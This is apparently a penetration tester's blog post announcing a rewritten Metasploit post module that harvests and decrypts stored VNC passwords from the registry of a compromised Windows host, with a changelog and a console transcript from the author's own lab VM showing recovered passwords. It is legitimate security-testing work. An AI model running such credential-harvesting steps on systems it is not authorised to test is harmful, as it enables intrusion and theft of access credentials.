Chris Gates wrote a blog post about the ‘getvncpw’ meterpreter script. I ran into the same issue on Penetration Tests in the past but didn’t know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn’t get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: “Thats definitely within my coding ability to contribute a patch for”. After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday. It went far and beyond just adding in a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and it’s control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well

It isn’t in the metasploit trunk so until/if if gets added you can get it here:

enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways) :

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINEAdministrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw 

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter >